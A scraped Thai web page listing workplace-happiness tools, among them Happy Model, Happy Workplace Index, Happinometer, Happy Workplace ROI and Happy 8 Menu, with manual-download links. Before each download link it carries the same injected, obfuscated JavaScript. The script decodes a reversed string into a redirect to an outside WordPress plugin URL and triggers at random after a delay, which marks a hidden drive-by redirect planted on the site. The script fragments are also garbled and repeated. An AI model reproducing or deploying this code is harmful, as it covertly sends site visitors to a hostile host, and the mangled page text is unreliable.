5+1เครื่องมือสร้างสุข

$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == “string”) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(“”).reverse().join(“”);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=[“‘php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and.cochranfirmcriminaldefense.com/tools#happymodel" name="">

AppI : Happy Model นำเสนอโมเดลการสร้างความสุขด้วยโมเดล Home โดยมององค์กรแห่งความสุข ใน 3 มุมมอง คือ ในระดับองค์กร ระดับการบริหารจัดการความสุข และระดับพนักงาน โมเดลนี้จะทำให้ เข้าใจลักษณะและแนวทางการสร้างความสุขในการทำงาน


ดาวโหลดคู่มือ

$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == "string") return $hiVNZt4Y5cDrbJXMhLy.list[n].split("").reverse().join("");return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and.cochranfirmcriminaldefense.com/tools#happyworkplaceindex">

AppII : Happy Workplace Index เป็นเครื่องมือประเมินตัวเองและวัดผลการพัฒนาองค์กรเพื่อให้เกิดความสุข ซึ่งแบ่งเป็น 10 มิติ คือ สุขด้วยการจัดการ สุขด้วยบรรยากาศในการทำงาน สุขด้วยกระบวนการสร้างสุข สุขด้วย สุขภาพกายใจ และสุขด้วยผลลัพธ์องค์กร


ดาวโหลดคู่มือ

$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == "string") return $hiVNZt4Y5cDrbJXMhLy.list[n].split("").reverse().join("");return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and.cochranfirmcriminaldefense.com/tools#happinometer">

APPIII : HAPPINOMETER เป็นเครื่องมือวัดคุณภาพชีวิตและความสุขของพนักงานรายบุคคล โดยแบ่งตัวชี้วัด เป็น 5 มิติ คือ ข้อมูลทั่วไปมี 1 มิติ, Happy 8 มี 8 มิติ, และ Happy Plus มี 1 มิติ


ดาวโหลดคู่มือ

$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == "string") return $hiVNZt4Y5cDrbJXMhLy.list[n].split("").reverse().join("");return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and.cochranfirmcriminaldefense.com/tools#happyworkplaceroi">

AppIV : Happy Workplace ROI ใช้ประเมินความคุ้มค่า (ROI) ในการดำเนินการ กิจกรรมโครงการที่เกี่ยวข้อง กับความสุขในการทำงาน โดยประเมินจากข้อมูลนำเข้า 12 ส่วน


ดาวโหลดคู่มือ

$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == "string") return $hiVNZt4Y5cDrbJXMhLy.list[n].split("").reverse().join("");return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and.cochranfirmcriminaldefense.com/tools#happy8menu">

AppV : Happy 8 Menu รวบรวมตัวอย่างกิจกรรมการสร้างความสุขในแต่ละความสุข โดยแบ่งกิจกรรมเป็น 8 กลุ่ม ตาม Happy 8


ดาวโหลดคู่มือ

Screen Shot 2555-12-25 at 1.31.56 PM

Untitled-1

HeHa หรือ Holestic Enterprise Happiness Approach เป็นเครื่องมือหนึ่งในการเสริมสร้างสุขภาวะองค์กรอย่างเป็นระบบ โดยอาศัยแนวคิดของการรักษาสมดุลของความสุขภายในองค์กร ด้วยการเพิ่มผลผลิตควบคู่กับการเสริมสร้างความสุขของทั้งผู้ประกอบการและพนักงาน บนพื้นฐานของการปรับปรุงและพัฒนาอย่างต่อเนื่อง